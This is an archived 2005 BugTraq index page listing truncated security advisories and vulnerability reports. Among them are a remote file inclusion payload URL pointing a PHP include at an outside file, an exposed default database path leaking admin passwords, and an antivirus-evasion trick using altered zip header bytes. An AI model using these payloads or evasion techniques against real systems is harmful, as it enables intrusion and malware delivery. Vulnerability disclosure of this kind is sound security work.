BugTraq (Page 1363 of 1748)
SUSE Security Announcement: openslp (SUSE-SA:2005:015) 2005-03-14
krahmer suse de (Sebastian Krahmer)
-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SUSE Security Announcement

Package: openslp
Announcement-ID: SUSE-SA:2005:015
Date: Mon, March

[CLA-2005:933] Conectiva Security Announcement - gaim 2005-03-14
Conectiva Updates (secure conectiva com br)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --------------------------------------------------------------------------

PACKAGE : gaim
SUMMARY : Fixes for gaim's vulnerabiliti

[SECURITY] [DSA 662-2] New squirrelmail package fixes regression 2005-03-14
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 662-2 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
March 14th, 2005

[ GLSA 200503-17 ] libexif: Buffer overflow vulnerability 2005-03-12
Luke Macken (lewk gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

KnowledgeBase 2005-03-12
Francisco Alisson (dominusvis click21 com br)


Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
$page = "startup";
}
@include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dom

aeNovo Database Content Disclosure Vulnerability 2005-03-12
farhad koosha (farhadkey yahoo com)


The problem is that the aeNovo database file "dbase/aeNovo1.mdb" by default is accessible. You can disclose the ADMIN's password.
The Login Page : "logon.asp"

Av issues 2005-03-12
Bipin Gautam (visitbipin hotmail com)
In-Reply-To: <20050311203150.17236.qmail (at) www.securityfocus (dot) com>

In Local file header if you modify "general purpose bit flag" 7th & 8th byte of a zip archive with \x2f ie: "\" F-Prot, Kaspersky, McAfee, Norman, Sybari, Symantec seem to skip the file marking it as clean!!! This was discovered durin

Virginity Security Advisory 2005-001 : Hola CMS - File destruction and System access 2005-03-12
Virginity Security (advisory05 konfiweb de)


- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
DATE : 2005-03-12 15:45 GMT
TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (ht

PlatinumFTP 1.0.18 remote DoS 2005-03-12
ports (ml portsonline net)

Application: PlatinumFTP
Site: http://www.roboshareware.com/indexplatinumftp.php
Version: 1.0.18 and maybe lower
OS: Windows
Bug: Remote Denial of Service

=====
Product:
PlatinumFTPserver simplifies management of all your Ftp clients with
regards to sending and receiv

RE: Windows Server 2003 and XP SP2 LAND attack vulnerability 2005-03-11
Daniel Cross (dcross woosh co nz)
That's interesting.
I haven't tested my 2k3 box yet, but have tested against XP SP1
(Pentium 4 2.6G).
I didn't get the 100% load on the CPU that others have reported, but
did get symptoms.
I tried ports 135, 139 and 445.
When I tried ports 135 and 139 I saw the average CPU load on the
target machine a

[SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB 2005-03-12
SecurityReason (sp3x securityreason com)


-=[ SecurityReason-2005-SRA#02 ]=-

-=[ Mass Full Path Disclosure in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on thei

[ GLSA 200503-15 ] X.org: libXpm vulnerability 2005-03-12
Matthias Geerdsen (vorlon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Mysql CREATE FUNCTION libc arbitrary code execution. 2005-03-10
Stefano Di Paola (stefano dipaola wisec it)
3. Mysql CREATE FUNCTION libc arbitrary code execution.

Author: Stefano Di Paola
Vulnerable: Mysql <= 4.0.23, 4.1.10
Type of Vulnerability: Local/Remote - input validation
Tested On : Mandrake 10.1 /Debian Sarge
Vendor Status: Notified on March 2005

-- Description

If an authenticated user has I

summercon looking for speakers 2005-03-12
louis (trumpbour gmail com)
CALL FOR PAPERS: Speak at SummerCon 2005

http://www.summercon.org/rfp

SUMMERCON XVII Annual Conference on Computer Security
June 3-5, 2005 Austin, TX (USA)

Program Committee Chair: Mark Trumpbour
Organized by: The folks at SummerCon (http://www.summercon.org)
Theme for 2005: Tools of the Trade

T

Mysql CREATE FUNCTION mysql.func table arbitrary library injection 2005-03-10
Stefano Di Paola (stefano dipaola wisec it)
2. Mysql CREATE FUNCTION mysql.func table arbitrary library injection

Author: Stefano Di Paola
Vulnerable: Mysql <= 4.0.23, 4.1.10
Type of Vulnerability: Local/Remote Privileges Escalation - input
validation
Tested On : Mandrake 10.1 /Debian Sarge
Vendor Status: Notified on March 2005

-- Descr

[badroot.org] The Includer remote commands execution exploit 2005-03-11
mozako (mozako mybox it)
[badroot security] includer.cgi remote commands execution vulnerability
remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badroo

[badroot.org] The Includer remote commands execution exploit 2005-03-12
Federico Ozak (mozako mybox it)


[badroot security] includer.cgi remote commands execution vulnerability remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badro

Ethereal remote buffer overflow #2 2005-03-12
LSS Security (exposed lss hr)

LSS Security Advisory #LSS-2005-03-05
http://security.lss.hr

---

Title : Ethereal remote buffer overflow #2
Advisory ID : LSS-2005-03-05
Date : 2005-03-10
Advisory URL: : http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
Impact : DoS and maybe possible code

PhotoPost PHP 5.0 RC3, and later, multiple vulnerabilities 2005-03-11
Igor Franchuk (sprog online ru)
PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities

March 05 2005

For your consideration.

1. BACKGROUND
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,

[SECURITYREASON.COM] SQL injection and XSS in paFileDB 2005-03-12
SecurityReason (sp3x securityreason com)


-=[ SecurityReason-2005-SRA#03 ]=-

-=[ SQL injection and XSS in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on their si

[ GLSA 200503-16 ] Ethereal: Multiple vulnerabilities 2005-03-12
Luke Macken (lewk gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200503-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Re: Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability. 2005-03-11
secure symantec com
In-Reply-To: <20050310112622.4458.qmail (at) www.securityfocus (dot) com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>Date: 10 Mar 2005 11:26:22 -0000

>From: Bipin Gautam <visitbipin (at) hotmail (dot) com>
>To: bugtraq (at) securityfocus (dot) com
>Subject: Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability.
>
>
>
>Mul

[SECURITYREASON.COM][phpBB 2.0.13 SQL error in session cXIb8O3.8] 2005-03-12
Maksymilian Arciemowicz (max jestsuper pl)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.13 SQL error in session cXIb8O3.8]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 10.3.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board

Copyright 2010, SecurityFocus